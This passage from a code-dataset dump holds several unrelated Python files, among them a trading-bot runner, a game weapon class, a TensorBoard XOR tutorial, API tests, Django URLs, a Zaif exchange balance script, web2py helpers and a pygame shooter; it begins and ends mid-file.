{0}\".format(data[\"CTI\"][\"tradeTypes\"][\"B\"])\n\t\tmarketOrder = \"Order Status: {0}\".format(data[\"CTI\"][\"orderStatus\"][\"S\"] if str(data[\"CTI\"][\"tradeTypes\"][\"B\"]) == \"None\" else data[\"CTI\"][\"orderStatus\"][\"B\"])\n\n\t\tif data[\"status\"] == \"RUNNING\":\n\t\t\tprint(\"[STATUS] {0} | {1} | lastUpdate: {2}\".format(marketTrade, marketOrder, data[\"time\"]))\n\n\t\tprint(\"[PRICES] buyPrice: {1:.{0}f} | sellPrice: {2:.{0}f} | lastPrice: {3:.{0}f}\".format(precis, data[\"CTI\"][\"buyPrice\"], data[\"CTI\"][\"sellPrice\"], data[\"CMI\"][\"lastPrice\"]))\n\t\tprint(\"[CONDITIONS] fast: {0:.8f} | slow: {1:.8f}\".format(MACD[0][\"fast\"], MACD[0][\"slow\"]))\n\n\nif __name__ == \"__main__\":\n\n\tif len(sys.argv) == 1: \n\t\tsetup()\n\t\trun_bots()\n\telif sys.argv[1] == \"init\":\n\t\tinitial_setup()\n\t\tprint(\"Initilization Successfull\")\n\telse:\n\t\tprint(\"incorrect argument\")\n\t\n\n\n\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"22127629","text":"import random\r\n\r\n\r\nclass Weapon:\r\n\r\n def __init__(self, name):\r\n self.name = name\r\n\r\n if name == \"Sword\":\r\n self.dmg = range(35, 41)\r\n self.cth = 0.75 # chance to hit\r\n\r\n elif name == \"Fists\":\r\n self.dmg = range(5, 6)\r\n self.cth = 0.8\r\n\r\n elif name == \"Spear\":\r\n self.dmg = range(22, 27)\r\n self.cth = 0.95\r\n\r\n elif name == \"Dagger\":\r\n self.dmg = range(10, 16)\r\n self.cth = 0.80\r\n\r\n elif name == \"Claws\":\r\n self.dmg = range(10, 12)\r\n self.cth = 0.7\r\n\r\n elif name == \"Bite\":\r\n self.dmg = 18\r\n self.cth = 0.4\r\n\r\n elif name == \"Kobold Spear\":\r\n self.dmg = range(8, 9)\r\n self.cth = 0.6\r\n\r\n def strike(self):\r\n if random.uniform(0, 1) > self.cth:\r\n print('The attack missed!')\r\n return 0\r\n else:\r\n print('The attack struck true!')\r\n return self.dmg[random.randint(0, len(self.dmg))-1]\r\n\r\n\r\n# test_sword = Weapon(\"Sword\")\r\n#\r\n# for i in range(0, 5):\r\n# print(test_sword.strike())\r\n","sub_path":"Weapon.py","file_name":"Weapon.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"234298707","text":"#TensorBoard\r\n\r\n#tensorbard 는 deep하고 wide하게 만들 때, 그 진행과정을 만드는 유용한 방법임. (그래프를 그림)\r\n#step에 따라서 loss가 어떻게 변화하는지를 볼 수 있음.\r\n# 이전에는 단순히 print로 본 것에서 upgrade 한 것임.\r\n\r\n#아래�� 5개의 step을 따라간다면, 멋진 그래프를 그릴 수 있음.\r\n\r\n############ 요약 ############\r\n\r\n#### 1 From TF graph, decide which tensors you want to log\r\n#### w2_hist = tf.summary.histogram('weights2',w2)\r\n#### cost_summ = tf.summary.scalar('cost',cost)\r\n\r\n#### 2. Merge all summaries\r\n#### summary = tf.summary.merge_all()\r\n\r\n#### 3. Create writer and add graph\r\n#### writer = tf.summary.FileWriter('./logs') #full path 입력해보기. // 어느위치에 경로를 적을껀지\r\n#### writer.add_graph(sess.graph) #같이 쓰면 됨.\r\n\r\n#### 4. Run summary merge and add_summary #summary자체도 tense이기 때문에 실행시켜야함.\r\n#### s, _ = sess.run([summary , optimizer],feed_dict=feed_dict)\r\n#### writer.add_summary(s , global_step=global_step) #실제로 파일에 기록하는 함수.\r\n\r\n#### 5. Launch TensorBoard #터미널 가서, 정해진 디렉토리를 '=' 오른쪽에 넣기\r\n#### tensorboard --logdir=./logs #\"--logdir=./logs\" 띄어쓰기 없이 하기\r\n\r\n#############################################################################################\r\n\r\n\r\n\r\n############ 순서 시작 ############\r\n\r\n# 1. 열심히 코드를 실행한다. (import부터 for문 다 돌리는거까지)\r\n# 2. 터미널에 [[[ tensorboard --logdir=./logs ]]] 를 실행한다.\r\n#### 이 의미는 , [[[ C:\\Users\\82104\\PycharmProjects\\untitled\\logs]]] 를 실행하는것. ###\r\n# 혹은, [[[ tensorboard --logdir=path/to/log-directory]]] 를 실행한다.\r\n# 이때, writer = tf.summary.FileWriter(\"./logs/xor_logs\") 와 같이 되어있을 것이다.\r\n# 참고 사이트 : https://tensorflowkorea.gitbooks.io/tensorflow-kr/content/g3doc/how_tos/summaries_and_tensorboard/\r\n\r\n# 3. 인터넷에 가서 [[[ localhost:6006 ]]] 를 입력하고 확인한다.\r\n# 4. 터미널을 종료하려면 [[[ ctrl+c ]]]를 누른다.\r\n\r\n# 5. 만약 여러개를 실행하고 싶으면,\r\n# 5-1 )\r\n# 코드 중 [[[ writer = tf.summary.FileWriter(\"./logs/xor_logs\") ]]] 로 바꾼다.\r\n# 또한 다르게 돌릴 목적에 맞게 코드를 수정한다. (ex: learning_rate = 0.1)\r\n# 터미널에 [[[ tensorboard --logdir=./logs/xor_logs ]]] 하고 데이터 돌리고 터미널 종료.\r\n# 5-2)\r\n# 코드 중 [[[ writer = tf.summary.FileWriter(\"./logs/xor_logs_r0_01\") ]]] 로 바꾼다.\r\n# 또한 다르게 돌릴 목적에 맞게 코드를 수정한다. (ex: learning_rate = 0.001)\r\n# 터미널에 [[[ tensorboard --logdir=./logs/xor_logs_r0_01 ]]] 하고 데이터 돌리고 터미널 종료.\r\n# 5-3)\r\n# 그리고 최종적으로 [[[ tensorboard --logdir=./logs ]]] 를 실행\r\n# 이러면 동시에 볼 수 있게 된다.\r\n\r\n#6. 만약 서버를 할당받고 싶으면,\r\n# 터미널에 [[[ ssh -L 7007:121.0.0.0:6006 donggyu@server.com ]]] 이라 하면,\r\n# 6006번에 해당하는게 7007번으로 donggyu이름을 지닌채 할당받음.\r\n# 이후 , 인터넷 주소창에 [[[ localhost:7007 ]]] 을 입력한다.\r\n\r\n############ 순서 끝 ############\r\n\r\n#Tensorboard Tip)\r\n# 1. Scalars\r\n# smoothing : 이동평균을 취해서 부드럽게 하라는것. 0값을 넣으면, 원데이터 그대로를보여줌.\r\n# 나머지는 직관적으로 볼 수 있음.\r\n\r\n#2. Graphs\r\n#우리가 어떻게 코딩을 했고, 어떤 알고리즘을 갖는지 시각적으로 표현하는 파트.\r\n#with문을 쓰고, name_scope를 쓰는 이유는 이 파트에서 깔끔하게 보기 위함.\r\n#그래프들을 더블클릭해서 세부 계산 과정을 볼 수 있음. 확인 해보기.\r\n\r\n#3. Histograms\r\n# y축은 step, x축은 벡터들의 원소가 가지는 각 값에 대한 분포임.\r\n# 즉, step 이 경과함에 따라 어떻게 값이 변화하는지를 볼 수 있음.\r\n\r\n###############################\r\n##### Tensorboard\r\n# Lab 9 XOR\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\n\r\ntf.set_random_seed(777) # for reproducibility\r\n\r\nx_data = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.float32)\r\ny_data = np.array([[0], [1], [1], [0]], dtype=np.float32)\r\n\r\nX = tf.placeholder(tf.float32, [None, 2], name=\"x\") #아래에서도 마찬가지지만, 이름을 정하자.\r\nY = tf.placeholder(tf.float32, [None, 1], name=\"y\")\r\n\r\n#Add scope for better graph hierarchy\r\n#그래프를 그릴때, layer1과 layer2를 보기 좋게 만들 수 있음.\r\n#아래처럼 하는걸 습관화하자. (tf.name_scope는 tensorboard에서 그래프 구성을 깔끔하게 볼 수 있도록 도와줌.)\r\n\r\nwith tf.name_scope(\"Layer1\"): #Layer1은 이름정한것.\r\n W1 = tf.Variable(tf.random_normal([2, 2]), name=\"weight_1\")\r\n b1 = tf.Variable(tf.random_normal([2]), name=\"bias_1\")\r\n layer1 = tf.sigmoid(tf.matmul(X, W1) + b1)\r\n\r\n tf.summary.histogram(\"W1\", W1) #tf.summary 매서드를 잊지말기.\r\n tf.summary.histogram(\"b1\", b1)\r\n tf.summary.histogram(\"Layer1\", layer1)\r\n\r\nwith tf.name_scope(\"Layer2\"):\r\n W2 = tf.Variable(tf.random_normal([2, 1]), name=\"weight_2\")\r\n b2 = tf.Variable(tf.random_normal([1]), name=\"bias_2\")\r\n hypothesis = tf.sigmoid(tf.matmul(layer1, W2) + b2)\r\n\r\n tf.summary.histogram(\"W2\", W2)\r\n tf.summary.histogram(\"b2\", b2)\r\n tf.summary.histogram(\"Hypothesis\", hypothesis)\r\n\r\n# cost/loss function\r\nwith tf.name_scope(\"Cost\"): #cost와 train 또한 그래프로 만들어 버린다. 습관화.\r\n cost = -tf.reduce_mean(Y * tf.log(hypothesis) + (1 - Y) * tf.log(1 - hypothesis))\r\n tf.summary.scalar(\"Cost\", cost) #cost는 scalar이기에, histogram 문법을 쓰지 않는다.\r\n\r\nwith tf.name_scope(\"Train\"):\r\n train = tf.train.AdamOptimizer(learning_rate=0.01).minimize(cost)\r\n#AdamOptimizer 란,\r\n# Momentum(모멘텀) + RMSprop(알엠에스프롭) 기법이 혼합된 최적화기법\r\n# (관성 효과 + 지수이동평균 의 혼합이다.) 이런게 있다 하고 넘어가기.\r\n#다음의 사이트를 참고하면 Optimizer들에 대한 이야기를 자세히 살필 수 있다.\r\n# https://twinw.tistory.com/247\r\n\r\n# Accuracy computation\r\n# True if hypothesis>0.5 else False\r\npredicted = tf.cast(hypothesis > 0.5, dtype=tf.float32)\r\naccuracy = tf.reduce_mean(tf.cast(tf.equal(predicted, Y), dtype=tf.float32))\r\ntf.summary.scalar(\"accuracy\", accuracy) #accuracy 또한 scalar이기에, histogram 문법을 쓰지 않는다.\r\n\r\n# Launch graph\r\nwith tf.Session() as sess:\r\n # tensorboard --logdir=./logs/xor_logs_r0_01 였음.\r\n merged_summary = tf.summary.merge_all() #요약 할것을 다합쳐버리고,\r\n writer = tf.summary.FileWriter(\"./logs/xor_logs_r0_01\") # 이 경로에 정보를 넣는다.\r\n # 이의미는 , C:\\Users\\82104\\PycharmProjects\\untitled\\logs\\xor_logs_r0_01 를 실행하는것.\r\n writer.add_graph(sess.graph) # Show the graph & Add graph in the tensorboard\r\n\r\n # Initialize TensorFlow variables\r\n sess.run(tf.global_variables_initializer())\r\n\r\n for step in range(10001):\r\n _, summary, cost_val = sess.run(\r\n [train, merged_summary, cost], feed_dict={X: x_data, Y: y_data} #train 시키면서 요약된 값들도 얻어내고,\r\n )\r\n writer.add_summary(summary, global_step=step) #요약본을 step이 진행될수록 계속 합쳐버리면서 누적시킨다. 이때 writer변수는\r\n #경로에 해당하는 변수이고, 데이터가 저장되는 공간 (위에서 정의함.)\r\n #add_summary(summary,step) 와 add_graph(sess.graph)를 잊지 말기.\r\n\r\n if step % 1000 == 0:\r\n print(step, cost_val)\r\n\r\n # Accuracy report\r\n h, p, a = sess.run(\r\n [hypothesis, predicted, accuracy], feed_dict={X: x_data, Y: y_data}\r\n )\r\n\r\n print(f\"\\nHypothesis:\\n{h} \\nPredicted:\\n{p} \\nAccuracy:\\n{a}\")\r\n\r\n\r\n##### 과제 해보기. mnist","sub_path":"Self_study/2019_Summer/Prof. KimSungHun Neural Network (Video)/Pycharm/9_2_Tensorboard_for_XOR_NN.py","file_name":"9_2_Tensorboard_for_XOR_NN.py","file_ext":"py","file_size_in_byte":7982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"156110441","text":"import os\nimport time\nimport pytest\nimport yaml\nimport allure\n\nfrom codeself.query import QueryApi\n\nyaml_file_path = os.path.dirname(__file__) + \"/citycode.yml\"\n\nwith open(yaml_file_path, encoding='utf-8') as f:\n dates = yaml.safe_load(f)\n citycode = dates['city']['ccode']\n qqcode = dates['qq']['code']\n qqid = dates['qq']['myid']\n\n@allure.feature(\"测试类1\")\nclass Testyiqin(QueryApi):\n def setup_class(self):\n self.query = QueryApi()\n\n\n @allure.story(\"测试方法1\")\n @pytest.mark.repeat(3)\n @pytest.mark.parametrize('cc', citycode)\n def test_anhui(self, cc):\n with allure.step('步骤1'):\n print(\"buzhou1\")\n r = self.s_query()\n # print(r)\n ass_list = self.query.jsonpath_res(r, \"$..city_id\")\n print(ass_list)\n assert cc in ass_list\n assert r['reason'] == 'success!'\n\n @allure.story(\"测试方法12\")\n @pytest.mark.parametrize(('key', 'qq'), qqcode, ids=qqid)\n def test_qq1(self, key, qq):\n r = self.qq_yun(key, qq)\n print(r)\n if r['reason'] == 'success!':\n assert r['error_code'] == 0\n elif r['reason'] == '错误的请求参数':\n assert r['error_code'] == 216602\n\n","sub_path":"codeself/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"584012856","text":"\"\"\"Đường dẫn tới các api\n\n\"\"\"\nfrom django.urls import path\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom api import views\n\nurlpatterns = [\n path('cases', views.CaseList.as_view()),\n path('cases//', views.CaseDetail.as_view()),\n path('teams', views.TeamList.as_view()),\n path('teams//', views.TeamDetail.as_view()),\n # path('contacts', views.ContactList.as_view()),\n # path('contacts//', views.ContactDetail.as_view()),\n # path('accounts', views.AccountList.as_view()),\n # path('accounts//', views.AccountDetail.as_view()),\n # path('addresses', views.AddressList.as_view()),\n # path('addresses//', views.AddressDetail.as_view()),\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)","sub_path":"MyProject/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"50675504","text":"import requests\nimport json\n\nfrom zaifapi import *\n\ndef zaif(api_key, api_key_secret):\n\n output_dict = {}\n fiat_values = {}\n\n try:\n pub = ZaifPublicApi()\n \n balances = ZaifTradeApi(api_key, api_key_secret).get_info()['funds']\n\n output_dict = {key.upper():value for key, value in balances.items() if float(value) > 0.0}\n for key, value in output_dict.items():\n if key == \"JPY\":\n fiat_values[key] = value\n elif key == \"BTC\":\n fiat_values[key] = float(pub.last_price('btc_jpy')['last_price']) * float(value)\n elif key == \"XEM\":\n fiat_values[key] = float(pub.last_price('xem_jpy')['last_price']) * float(value)\n elif key == \"MONA\":\n fiat_values[key] = float(pub.last_price('mona_jpy')['last_price']) * float(value)\n\n return [output_dict,fiat_values]\n\n except:\n return [output_dict,fiat_values]","sub_path":"markets/zaif.py","file_name":"zaif.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"200822645","text":"import numpy as np\n\ndata = np.random.random((200, 2))\ndata = data*100\n\nds = []\nfor x in data:\n x = list(x)\n if x[0]<=40 and x[1]<=40:\n x.append('1.0')\n ds.append(x)\n elif x[0]>=60 and x[1]>=60:\n x.append('0.0')\n ds.append(x)\n\nfp = open('owndata.txt', \"w\")\nfor x in ds:\n fp.write(str(round(x[0], 3))+'\\t'+str(round(x[1], 3))+'\\t'+ str(x[2]) +'\\n')\nfp.close()\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"482184776","text":"# -*- coding: utf-8 -*-\nimport re\n\ndef fun_input(ident, titulo, fondo=\"\",tipo=\"text\",valor=\"\" ):\n\tsalida = DIV(_class=\"form-group\")\n\tif tipo==\"checkbox\":\n\t\tsalida.append(INPUT(_type=\"checkbox\",_id=ident, _name=ident, value=valor))\n\t\tsalida.append(\"|\")\n\t\tsalida.append(LABEL(titulo))\n\telif tipo==\"textarea\":\n\t\tsalida.append(LABEL(titulo,_for=f\"lb_{titulo}\"))\n\t\tsalida.append(TEXTAREA(valor, _cols=60))\n\telse:\n\t\tsalida.append(LABEL(titulo,_for=f\"lb_{titulo}\"))\n\t\tsalida.append(INPUT(_type=tipo, _id=ident, _name=ident, _class=\"form-control\",_placeholder=fondo, value=valor) )\n\n\treturn salida\n\ndef es_correo_valido(correo):\n if correo==None: return None\n expresion_regular = r\"(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|\\\"(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21\\x23-\\x5b\\x5d-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])*\\\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21-\\x5a\\x53-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])+)\\])\"\n return re.match(expresion_regular, correo) is not None\n\ndef fun_ActivarDataTable():\n\t##Envia los script necesario para activar datatable\n\tresponse.files.append(URL('static','js/jquery.dataTables.js'))\n\tresponse.files.append(URL('static','js/dataTables.buttons.min.js'))\n\tresponse.files.append(URL('static','js/buttons.flash.min.js'))\n\tresponse.files.append(URL('static','js/jszip.min.js'))\n\tresponse.files.append(URL('static','js/pdfmake.min.js'))\n\tresponse.files.append(URL('static','js/vfs_fonts.js'))\n\tresponse.files.append(URL('static','js/buttons.html5.min.js'))\n\tresponse.files.append(URL('static','js/buttons.print.min.js'))\n\tresponse.files.append(URL('static','css/jquery.dataTables.min.css'))\n\tresponse.files.append(URL('static','css/buttons.dataTables.min.css'))\n\ndef itemmenus(contenedor,items):\n\tmenus=LI(contenedor, _class=\"nav-header alert-primary\")\n\tfor item in items:\n\t\tmenus.append(LI(A(DIV(\n\t\t\t\t\t\t\tDIV(I(_class=item[0], _style=\"color:yellow\"), _class=\"col-sm-2\"),\n\t\t\t\t\t\t\tDIV(item[1],_class=\"col-sm-10 nav-header\"),\n\t\t\t\t\t\t\t_class=\"row\"),\n\t\t\t\t\t\t_href=item[2])\n\t\t\t\t\t\t))\n\treturn menus\n\ndef fun_Menu():\n\tsalida=UL(_class=\"nav\")\n\tsalida.append(itemmenus(\"\",(\n\t\t\t\t\t\t\t\t\t(\"fas fa-home\",T('Home'), URL('default', 'index')),\n\t\t\t\t\t\t\t\t\t)))\n\n\tif auth.has_membership(\"Administradores\") or auth.has_membership(\"Super\"):\n\t\tsalida.append(itemmenus(\"ADMINISTRACION\",(\n\t\t\t\t\t\t(\"fas fa-users-cog fa-xs\",\"Administrar\",URL('administrar', 'index')),\n\t\t\t\t\t\t(\"fas fa-hammer fa-xs\",\"Parametros\",URL('parametros', 'index')),\n\t\t\t\t)))\n\tif auth.has_membership(\"Administradores\") or auth.has_membership(\"Super\") or auth.has_membership(\"Gerencia\"):\n\t\tsalida.append(itemmenus(\"MODULOS\",(\n\t\t\t\t\t(\"fab fa-telegram-plane fa-xs\",T('Comprobante de Pago a Proveedores'), URL('compegreso', 'index')),\n\t\t\t\t\t(\"fab fa-deploydog fa-xs\", T('Comprobante de Pago a Empleados'), URL('compnomina', 'index')),\n\t\t\t\t\t(\"fas fa-certificate fa-xs\",T('Certificación de Retención por IVA'), URL('retiva', 'index')),\n\t\t\t\t\t(\"fas fa-wallet fa-xs\",T('Ret. Fuente, Ret. ICA'), URL('compretencionanual', 'index')),\n\t\t\t\t\t(\"fas fa-wallet fa-xs\",T('Retención Dian'), URL('comp_dian', 'index')),\n \t\t\t\t)))\n\t#if auth.has_membership(\"Proveedor\") or auth.has_membership(\"Empleados\") or auth.has_membership(\"Super\"):\n\tsalida.append(itemmenus(\"DOCUMENTOS\",(\n\t\t\t\t\t\t\t\t\t(\"fas fa-book fa-xs\",T('Publicaciones'), URL('documentos', 'index')),\n\t\t)))\n\tif auth.has_membership(\"Super\"):\n\t\tsalida.append(itemmenus(\"GENERAL\",(\n\t\t\t\t\t\t\t\t\t(\"fas fa-radiation-alt\",T('Configuracion'), URL('cntrpal', 'index')),\n\t\t)))\n\n\n\tsalida.append(\n\t\tLI(XML(''),\n\t\t)\n\t)\n\treturn salida\n\n\ndef BuscarEnClientes(tipo):\n fecha_inicio=request.vars.fecha_inicio or None\n fecha_final=request.vars.fecha_final or None\n nit=request.vars.nit_correo or None\n salida=\"\"\n consulta =db.tbl_recepcion.tipdoc==tipo\n\n if fecha_inicio:\n fecha_inicio +=\" 00:00:00\"\n consulta &= db.tbl_recepcion.fechaenvio>=fecha_inicio\n if fecha_final:\n fecha_final += \" 23:59:59\"\n consulta &= db.tbl_recepcion.fechaenvio<=fecha_final\n\n subconsulta=None\n if nit:\n nit=f\"%{nit}%\"\n idclientes=db(db.tbl_cliente.nit.like(nit) | db.tbl_cliente.nombre.like(nit)).select(db.tbl_cliente.id)\n\n if idclientes:\n for idcliente in idclientes:\n if subconsulta:\n subconsulta |=db.tbl_recepcion.id_cliente==idcliente.id\n else:\n subconsulta =db.tbl_recepcion.id_cliente==idcliente.id\n else:\n salida =DIV(\"No se encontro la busqueda solicitada\",_class=\"alert alert-danger\", _role=\"alert\")\n return salida\n\n tempo =db.tbl_recepcion.estado==\"Q\"\n tempo |=db.tbl_recepcion.estado==\"T\"\n tempo |=db.tbl_recepcion.estado==\"F\"\n #### Nuevo\n consulta &=tempo\n if subconsulta: consulta &= subconsulta\n ####\n x=consulta\n consulta=db(consulta).select()\n tabla=TABLE(_class=\"table table-striped\")\n #tabla.append(THEAD(TR(TH(\"Empleados\"),TH(\"Doc. id\"), TH(\"Nro. Doc.\"), TH(\"Estado\"),TH(\"Fecha Envio\"), TH(\"Controles\"))))\n tabla.append(THEAD(TR(TH(\"Empleados\"),TH(\"Doc. id\"), TH(\"Nro. Doc.\"), TH(\"Fecha Envio\"), TH(\"Controles\"))))\n #tabla.append(TR(TD(fecha_inicio),TD(tempo), TD(x), TD(consulta)))\n for item in consulta:\n tabla.append(TR(TD(item.id_cliente.nombre),\n TD(item.id_cliente.nit),\n TD(item.nrodoc),\n #TD(T(item.tarea.status)),\n TD(item.fechaenvio),\n TD( SPAN (\n A(I(\" \",_class=\"far fa-file-pdf\"),_class=\"btn btn-sm btn-danger btn-circle text-white\",\n _onclick=\"ajax('{}',['superid'],':eval');$('#visorPDF').modal('show');\".format(URL(\"verpdf\",vars=dict(idpdf=item.id)))),\n _class=\"d-inline-block\", _tabindex=\"0\",_title=\"Ver Docmento\", **{'data-toggle':\"tooltip\", \"data-placement\":\"top\"}),\n \"|\",\n SPAN (A(I(\" \",_class=\"fas fa-mail-bulk\"),_class=\"btn btn-sm btn-success btn-circle btn text-white\",\n _onclick=\"$('#DialModal').modal('show');ajax('{}',['usrid'],':eval');\".format(URL('ReenvioCorreo',vars=dict(id_recepcion=item.id)))),\n _class=\"d-inline-block\", _tabindex=\"0\",_title=\"Reeviar Correo\", **{'data-toggle':\"tooltip\"}),\n _align=\"right\"\n )\n )\n )\n salida=tabla\n return salida\n","sub_path":"models/funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":6866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"175752693","text":"\"\"\"\n This will hold the information from Google Sheets Intra data\n\n\"\"\"\nfrom Classes.OLHBasicClass import OLHBasicClass\n\n\nclass OLHSheetsClass(OLHBasicClass): # pylint: disable=too-few-public-methods , too-many-arguments\n \"\"\"\n OLHSheetsClass\n\n \"\"\"\n def __init__(self, script, trade_time, p_open, high, low, ltp,volume, prev_close, cond):\n OLHBasicClass.__init__(self, script, trade_time, p_open,high ,low, ltp, volume, prev_close)\n self.cond = cond\n\n\n def __str__(self):\n ''' String representation of OLHSheetsClass '''\n olh_str = 'SCRIPT:{},OPEN={};HIGH={};LOW={};LTP={};PCLOSE={};Cond-{};'.format(\n self.script, self.p_open, self.high, self.low, self.ltp, self.pclose, self.cond\n )\n return olh_str\n\n def __repr__(self):\n ''' Representation of OLHSheetsClass '''\n olh_str = 'OLHSheetsClass({},{},{},{},{},{},{}'.format(\n self.script, self.p_open, self.high, self.low, self.ltp, self.pclose, self.cond\n )\n return olh_str\n\n\n\n","sub_path":"classes/OLHSheetsClass.py","file_name":"OLHSheetsClass.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"159526720","text":"import pygame\n\nfrom game import BossOne, Enemy, Menu, Meteor, Player, Spritesheet, settings\n\n\nclass Game(object):\n \"\"\"Intergalactic Uprising Game\"\"\"\n\n def __init__(self):\n \"\"\"Creates a new Game.\"\"\"\n pygame.init()\n pygame.mixer.init()\n pygame.mixer.music.load(settings.MAIN_THEME_SFX)\n pygame.mouse.set_visible(False)\n pygame.display.set_caption(\"Intergalactic Uprising\")\n self.screen = pygame.display.set_mode(\n (settings.WIDTH, settings.HEIGHT)\n )\n self.display = pygame.display.Info()\n self.load_resources()\n self.sprites = pygame.sprite.Group()\n self.players = pygame.sprite.Group()\n self.enemies = pygame.sprite.Group()\n self.bosses = pygame.sprite.Group()\n self.meteors = pygame.sprite.Group()\n self.shots = pygame.sprite.Group()\n self.enemies_shots = pygame.sprite.Group()\n self.explosions = pygame.sprite.Group()\n self.pows = pygame.sprite.Group()\n self.shields = pygame.sprite.Group()\n self.running = False\n self.clock = pygame.time.Clock()\n self.main_menu = Menu(self)\n self.main_menu.draw()\n\n def new(self):\n \"\"\"Initializes a new game.\"\"\"\n self.sprites.empty()\n self.players.empty()\n self.enemies.empty()\n self.bosses.empty()\n self.meteors.empty()\n self.shots.empty()\n self.enemies_shots.empty()\n self.explosions.empty()\n self.pows.empty()\n self.shields.empty()\n self.mob_limit = 10\n self.enemies_remaining = 100\n self.player = Player(self, groups=[self.sprites, self.players])\n self.release_mobs()\n self.score = 0\n self.running = True\n\n def run(self):\n \"\"\"Game main loop.\"\"\"\n pygame.mixer.music.play(loops=-1)\n while self.running:\n self.clock.tick(settings.FPS)\n self.events()\n self.update()\n self.draw()\n self.over()\n pygame.mixer.music.fadeout(500)\n\n def events(self):\n \"\"\"Event handler.\n\n Decide which action perform based on window and keyboard events.\n \"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n self.running = False\n if event.key == pygame.K_RETURN and not self.player.alive():\n self.new()\n\n def update(self):\n \"\"\"Update sprites.\"\"\"\n self.sprites.update()\n\n def draw(self):\n \"\"\"Put everything on screen.\"\"\"\n self.fill_background()\n self.sprites.draw(self.screen)\n if settings.DEBUG:\n # Draw a red rectangle around each sprite for debugging.\n for sprite in self.sprites.sprites():\n pygame.draw.rect(self.screen, settings.RED, sprite.rect, 2)\n self.draw_text(str(self.score), (self.display.current_w / 2, 10))\n self.draw_bar((self.player.energy / 100), (75, 15))\n self.draw_lives()\n if not self.player.alive():\n # Show game over message.\n centerx = self.display.current_w / 2\n centery = self.display.current_h / 2\n self.draw_text(\n \"Game Over\", (centerx, centery - 48), settings.FONT_LG_SIZE\n )\n self.draw_text(\"[Return] play again.\", (centerx, centery + 24))\n self.draw_text(\"[Escape] main menu.\", (centerx, centery + 48))\n pygame.display.flip()\n\n def draw_text(\n self, text, pos, size=settings.FONT_SIZE, color=settings.WHITE\n ):\n \"\"\"Draws a text on screen.\n\n Args:\n text: The text string to be draw.\n pos: The X and Y positions on screen.\n size: Text size.\n color: Text color.\n \"\"\"\n font = pygame.font.Font(settings.FONT, size)\n surface = font.render(text, True, color)\n rect = surface.get_rect()\n rect.midtop = pos\n self.screen.blit(surface, rect)\n\n def draw_bar(self, percent, pos, color=None):\n \"\"\"Draws a status bar on screen.\n\n Args:\n percent: The percentage of the bar to be filled.\n pos: The X and Y positions on screen.\n color: The color for the filled area of the bar.\n \"\"\"\n x, y = pos\n width, height = 100, 10\n fill = percent * width\n if not color:\n if percent < 0.2:\n color = settings.RED\n elif percent < 0.5:\n color = settings.YELLOW\n else:\n color = settings.GREEN\n outline = pygame.Rect(x, y, width, height)\n filled = pygame.Rect(x, y, fill, height)\n pygame.draw.rect(self.screen, color, filled)\n pygame.draw.rect(self.screen, settings.WHITE, outline, 2)\n\n def draw_lives(self):\n \"\"\"Draws player's lives.\"\"\"\n icon_rect = self.player_ico_img.get_rect()\n icon_rect.center = (25, 20)\n lives = self.player.lives\n if lives:\n lives -= 1\n self.screen.blit(self.player_ico_img, icon_rect)\n self.draw_text(str(lives), (60, 10))\n\n def fill_background(self):\n \"\"\"Fill screen background.\"\"\"\n self.screen.fill(settings.BLACK)\n\n def spawn_enemy(self):\n \"\"\"Spawns a new enemy.\"\"\"\n if self.enemies_remaining:\n self.enemies_remaining -= 1\n Enemy(self, groups=[self.sprites, self.enemies])\n elif not self.bosses.sprites():\n BossOne(self, groups=[self.sprites, self.bosses])\n\n def spawn_meteor(self):\n \"\"\"Spawns a new meteor.\"\"\"\n Meteor(self, groups=[self.sprites, self.meteors])\n\n def release_mobs(self):\n \"\"\"Release the mobs.\n\n It will be 2/3 of enemies and 1/3 of meteors.\n \"\"\"\n enemies = int(self.mob_limit * 2 / 3)\n moteors = int(self.mob_limit / 3)\n for _ in range(enemies):\n self.spawn_enemy()\n for _ in range(moteors):\n self.spawn_meteor()\n\n def load_resources(self):\n \"\"\"Loads resource data like images and sfx.\"\"\"\n self.spritesheet = 